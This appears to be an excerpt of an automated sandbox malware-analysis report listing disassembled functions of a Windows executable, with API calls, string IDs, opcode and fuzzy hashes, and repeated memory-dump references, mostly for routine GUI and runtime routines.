                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: DecrementH_prologInterlocked
                                                                                                                • String ID: Name$SessionVar$Type$Value
                                                                                                                • API String ID: 3164693477-3658809614
                                                                                                                • Opcode ID: c30fba80bfb5f512735ab7995e7e5ebdfa5f859731753a1f4153265da0c30fc5
                                                                                                                • Instruction ID: 559d49df9738f0f2aa537b90bad7d7da7e2bc04790b709e0d6a737118b72b1b9
                                                                                                                • Opcode Fuzzy Hash: c30fba80bfb5f512735ab7995e7e5ebdfa5f859731753a1f4153265da0c30fc5
                                                                                                                • Instruction Fuzzy Hash: C031A035600204AACB05FB66C45ABFE7B669F80358F04C46FF416A72C2CF7CAE46C659
                                                                                                                Function 004D4A32 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 88stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?), ref: 004D4A63
                                                                                                                  • Part of subcall function 004D4B4F: lstrlen.KERNEL32(00000104,00000000,?,004D4A93), ref: 004D4B86
                                                                                                                • lstrcpy.KERNEL32(?,.HLP), ref: 004D4B04
                                                                                                                • lstrcat.KERNEL32(?,.INI), ref: 004D4B31
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileModuleNamelstrcatlstrcpylstrlen
                                                                                                                • String ID: .HLP$.INI
                                                                                                                • API String ID: 2421895198-3011182340
                                                                                                                • Opcode ID: 2a8125e53c11a3b11c689ea8270c5afba2f51a438d7ab26526c8496349fead54
                                                                                                                • Instruction ID: 6fc6edcaa4ee4fa5cc92a090c15fa21088debc593625c09b02b9fd64cf0048fe
                                                                                                                • Opcode Fuzzy Hash: 2a8125e53c11a3b11c689ea8270c5afba2f51a438d7ab26526c8496349fead54
                                                                                                                • Instruction Fuzzy Hash: 6A3196B55047189FDB20EB71CC84BC6B7FCAB08314F10496BE199D3252DB74AA848F58
                                                                                                                Function 00438B28 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 85COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00438B2D
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlocked
                                                                                                                • String ID: Drive$Extension$Filename$Folder
                                                                                                                • API String ID: 2206737547-2892895018
                                                                                                                • Opcode ID: d1446d1aa75ba1a8266e846b7f80a1937c37d196177ba52ef51e3ea5255a23eb
                                                                                                                • Instruction ID: ff92154404ea6af389b92728fe176bb0ebe635ab6eeb443a2fc1549e66cd24c7
                                                                                                                • Opcode Fuzzy Hash: d1446d1aa75ba1a8266e846b7f80a1937c37d196177ba52ef51e3ea5255a23eb
                                                                                                                • Instruction Fuzzy Hash: 0D21B2B545252876DB02F7568C02FDE322C9F02358F04469BF925710D2EB6C67834BED
                                                                                                                Function 00414A15 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 72fileCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 00414A1A
                                                                                                                  • Part of subcall function 004B0B55: GetFileAttributesA.KERNEL32(-R,004BD3B6,?,00000000,00000000,00522DE4,?,?,?,004EF72C,00000000), ref: 004B0B59
                                                                                                                  • Part of subcall function 004B0B55: GetLastError.KERNEL32(?,?,?,004EF72C,00000000), ref: 004B0B64
                                                                                                                • DeleteFileA.KERNEL32(?,?,00414941,?,?,000000FA,?,?,?,?), ref: 00414AB1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: File$AttributesDeleteErrorH_prologLast
                                                                                                                • String ID: %s\%s.lnk$%s\%s.pif$%s\%s.url
                                                                                                                • API String ID: 1057747857-1849461506
                                                                                                                • Opcode ID: ea22b7530dbc3889c1a7079c18179179b410e677ec402c7a6711ce900b516dd8
                                                                                                                • Instruction ID: d92c79b5f5e9cfdc62d802060550f424704f1858d4e759b7e3212320cb182e55
                                                                                                                • Opcode Fuzzy Hash: ea22b7530dbc3889c1a7079c18179179b410e677ec402c7a6711ce900b516dd8
                                                                                                                • Instruction Fuzzy Hash: BE21AE3190021EBADF00EBA1CD51EEFBB69FF10389F00806EF815A2191D7789A448B58
                                                                                                                Function 0046CBF4 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 43COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0046CBF9
                                                                                                                  • Part of subcall function 004688E5: __EH_prolog.LIBCMT ref: 004688EA
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0045FEA5: __EH_prolog.LIBCMT ref: 0045FEAA
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$lstrlen
                                                                                                                • String ID: IDS_CTRL_HEADINGTEXT_BODY$IDS_CTRL_STATICTEXT_BODY$Title$Your text goes here.
                                                                                                                • API String ID: 3243491680-687506183
                                                                                                                • Opcode ID: 525c8266ca3ddf2e46b0d668a3e02e270a661406b98f022142d997e70473989d
                                                                                                                • Instruction ID: 105b25ec1624ad8ba1d423fa81cba85b5b27e6adb824cc79459d558898aa8880
                                                                                                                • Opcode Fuzzy Hash: 525c8266ca3ddf2e46b0d668a3e02e270a661406b98f022142d997e70473989d
                                                                                                                • Instruction Fuzzy Hash: 200184B4A20609BBDF08BF59C917AEE7FB1EB05714F00421EF011621D2CBB81B4086EA
                                                                                                                Function 0049CB80 Relevance: 7.8, APIs: 4, Strings: 1, Instructions: 309COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsGetValue.KERNEL32(0000001C,00000005,?,?,?,0049DE6C,?), ref: 0049CB8D
                                                                                                                Strings
                                                                                                                • %02u/%02u/%02u %02u:%02u, xrefs: 0049CE64
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Value
                                                                                                                • String ID: %02u/%02u/%02u %02u:%02u
                                                                                                                • API String ID: 3702945584-3598649713
                                                                                                                • Opcode ID: d4e109c05d319f4413824bca8a8b348024662cad34a39dcea20a531305c0660d
                                                                                                                • Instruction ID: ebbe4f52e660b47e4a3f7d3e3b5692c1a7f65e9970843013d5417d375fc9d7a0
                                                                                                                • Opcode Fuzzy Hash: d4e109c05d319f4413824bca8a8b348024662cad34a39dcea20a531305c0660d
                                                                                                                • Instruction Fuzzy Hash: AFB1D9B26007055BE720DF25E881BA7B7E4EF95314F04493FE95E87346DA39B408CB6A
                                                                                                                Function 004483D8 Relevance: 7.6, APIs: 5, Instructions: 100COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004C9592: ShowWindow.USER32(?,?,004CA545,00000000,0000E146,00000000,?,?,0040A373), ref: 004C95A0
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00448402
                                                                                                                • GetWindowRect.USER32(?,?), ref: 0044840B
                                                                                                                  • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC57
                                                                                                                  • Part of subcall function 004CCC43: ScreenToClient.USER32(?,?), ref: 004CCC60
                                                                                                                  • Part of subcall function 004C9502: MoveWindow.USER32(?,?,00000001,?,?,?,?,0040A7C9,?,?,?,?,00000001,?,00000000), ref: 004C951E
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105,?,?,?,?,00000001,?), ref: 00448465
                                                                                                                • GetWindowRect.USER32(?,?), ref: 00448494
                                                                                                                • RedrawWindow.USER32(?,00000000,00000000,00000105), ref: 004484E7
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Rect$ClientRedrawScreen$MoveShow
                                                                                                                • String ID:
                                                                                                                • API String ID: 3454447493-0
                                                                                                                • Opcode ID: ae0968fc9ab66b3988928cf145baaa327219726bd97893d72e64fc6fb017e9af
                                                                                                                • Instruction ID: 72597439327d3a54ffac366992c5cec3166725d11840ffc99d7e69c298594115
                                                                                                                • Opcode Fuzzy Hash: ae0968fc9ab66b3988928cf145baaa327219726bd97893d72e64fc6fb017e9af
                                                                                                                • Instruction Fuzzy Hash: 0F31F572A00219BFDF11DFE8CD85FEEB7B9FF08304F04451AE655A6190D674AD048B54
                                                                                                                Function 004203E9 Relevance: 7.6, APIs: 5, Instructions: 91COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004203EE
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00420415
                                                                                                                • __ftol.LIBCMT ref: 00420424
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5C1F: InterlockedIncrement.KERNEL32(?), ref: 004C5C34
                                                                                                                  • Part of subcall function 00451AED: SendMessageA.USER32(?,0000014A,000000FF,?), ref: 00451B1A
                                                                                                                • IsWindow.USER32(?), ref: 00420497
                                                                                                                • InvalidateRect.USER32(?,-00000018,00000001,?,00000004,00000000,00000000,00000000), ref: 004204B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$__ftol$IncrementInterlockedInvalidateMessageRectSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 4170118472-0
                                                                                                                • Opcode ID: d446219621fe8f7652052798461b7db9ec6aa4f2d2671599cdbc535eaa0f53c1
                                                                                                                • Instruction ID: b42f8c76adf6d359db629a225f1fa2b192ae5e4a515f5390625b3e2f98c09a52
                                                                                                                • Opcode Fuzzy Hash: d446219621fe8f7652052798461b7db9ec6aa4f2d2671599cdbc535eaa0f53c1
                                                                                                                • Instruction Fuzzy Hash: C3315671A00604BBCB10FF66CC46FEE77A8EF41718F00411EF511AB2D2DB799A408769
                                                                                                                Function 004209E6 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 004209EB
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                • __ftol.LIBCMT ref: 00420A11
                                                                                                                • __ftol.LIBCMT ref: 00420A23
                                                                                                                • IsWindow.USER32(?), ref: 00420A62
                                                                                                                • SendMessageA.USER32(?,00000146,00000000,00000000), ref: 00420A7B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog__ftol$MessageSendWindow
                                                                                                                • String ID:
                                                                                                                • API String ID: 414663571-0
                                                                                                                • Opcode ID: efdd515f9d05372d718f44b0e976e597e8fc7bbed5f5cbd5ed71d354cd82843f
                                                                                                                • Instruction ID: 15610e2b9c88cca5bac40159eca9d8cd2d319130df8af0b2cf5214f4db6a270d
                                                                                                                • Opcode Fuzzy Hash: efdd515f9d05372d718f44b0e976e597e8fc7bbed5f5cbd5ed71d354cd82843f
                                                                                                                • Instruction Fuzzy Hash: 4821D631B1062AABDB11EBA2DC06FEE77A5EF50744F44001EF411AA1D2DB799E01876D
                                                                                                                Function 004D09B1 Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 004D0A13
                                                                                                                • GlobalAddAtomA.KERNEL32(?), ref: 004D0A22
                                                                                                                • GlobalGetAtomNameA.KERNEL32(?,?,00000103), ref: 004D0A38
                                                                                                                • GlobalAddAtomA.KERNEL32(?), ref: 004D0A41
                                                                                                                • SendMessageA.USER32(?,000003E4,?,?), ref: 004D0A65
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AtomGlobal$Name$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1515195355-0
                                                                                                                • Opcode ID: 46ecb545ac0a4ce1fa19fd15e6d59622c091c330353c892be25fb7f7b1e019ff
                                                                                                                • Instruction ID: c178a7f9b264245205d65ae93b38186fc3cd1e9163872f36e5ba7fa38ea75c83
                                                                                                                • Opcode Fuzzy Hash: 46ecb545ac0a4ce1fa19fd15e6d59622c091c330353c892be25fb7f7b1e019ff
                                                                                                                • Instruction Fuzzy Hash: EA119475D00718AADB20EF64CC54BEBB3BCEB14740F404457E59597241E7B8ABC1CB64
                                                                                                                Function 004D44BA Relevance: 7.5, APIs: 5, Instructions: 35COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • TlsFree.KERNEL32(00000000,?,?,004D49C7,00000000,00000001), ref: 004D44C6
                                                                                                                • GlobalHandle.KERNEL32(006DB280), ref: 004D44EE
                                                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004D44F7
                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 004D44FE
                                                                                                                • RtlDeleteCriticalSection.NTDLL(005265A4), ref: 004D4508
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Global$Free$CriticalDeleteHandleSectionUnlock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2159622880-0
                                                                                                                • Opcode ID: cb6da8d783fc6681e8d8de56225f6df150f11cbab41be80f81569ff4ee8617ff
                                                                                                                • Instruction ID: 63e9dbe670a203257b058ace1d018806896b9d500556565e34a7c755de825dfa
                                                                                                                • Opcode Fuzzy Hash: cb6da8d783fc6681e8d8de56225f6df150f11cbab41be80f81569ff4ee8617ff
                                                                                                                • Instruction Fuzzy Hash: 23F054356002105BC6209B68AD58A2B77ADAFD5760B1A062AF805D7352DB78DC058A68
                                                                                                                Function 00434327 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 249sleepCOMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043432C
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                • __ftol.LIBCMT ref: 004343CF
                                                                                                                • Sleep.KERNEL32(000003E8,?,?,00523A30,00000000), ref: 00434582
                                                                                                                  • Part of subcall function 00405829: __EH_prolog.LIBCMT ref: 0040582E
                                                                                                                  • Part of subcall function 004C5EAA: InterlockedDecrement.KERNEL32(-000000F4), ref: 004C5EBE
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000050F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000522000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.0000000000528000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3347950630.000000000052F000.00000040.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348311815.0000000000535000.00000080.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000031.00000002.3348344619.0000000000537000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_49_2_400000_lBoqoqIC.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: H_prolog$DecrementInterlockedSleep__ftollstrlen
                                                                                                                • String ID: M
                                                                                                                • API String ID: 2235712041-2059362058
                                                                                                                • Opcode ID: ecb8d47e500eefbf028a52efdbde302e8cbcef04fa6b3e4522e1921532059f44
                                                                                                                • Instruction ID: 2609724d6b425b12864784c18ee052514be183a7909086b7665e80e96c9da8bd
                                                                                                                • Opcode Fuzzy Hash: ecb8d47e500eefbf028a52efdbde302e8cbcef04fa6b3e4522e1921532059f44
                                                                                                                • Instruction Fuzzy Hash: C181DF31D00218ABCB15EBA6C842BEFB778AF58714F14406FF501B62C1DF386A85CB69
                                                                                                                Function 00438537 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 164COMMON
                                                                                                                Download Yara Rule
                                                                                                                APIs
                                                                                                                • __EH_prolog.LIBCMT ref: 0043853C
                                                                                                                  • Part of subcall function 0041EBE5: __EH_prolog.LIBCMT ref: 0041EBEA
                                                                                                                  • Part of subcall function 0041EC79: __EH_prolog.LIBCMT ref: 0041EC7E
                                                                                                                  • Part of subcall function 004C5F18: lstrlen.KERNEL32(?,00000000,00000000,?,00401A07,?,?), ref: 004C5F42
                                                                                                                  • Part of subcall function 0041ED1A: __EH_prolog.LIBCMT ref: 0041ED1F
                                                                                                                • __ftol.LIBCMT ref: 00438677
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000031.00000002.3347950630.0000000000401000.00000040.00000001.01000000.0000000F.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000031.00000002.3347834413.0000000000400000.00000002.00000001.01000000.0000000F.sdmpDownload File
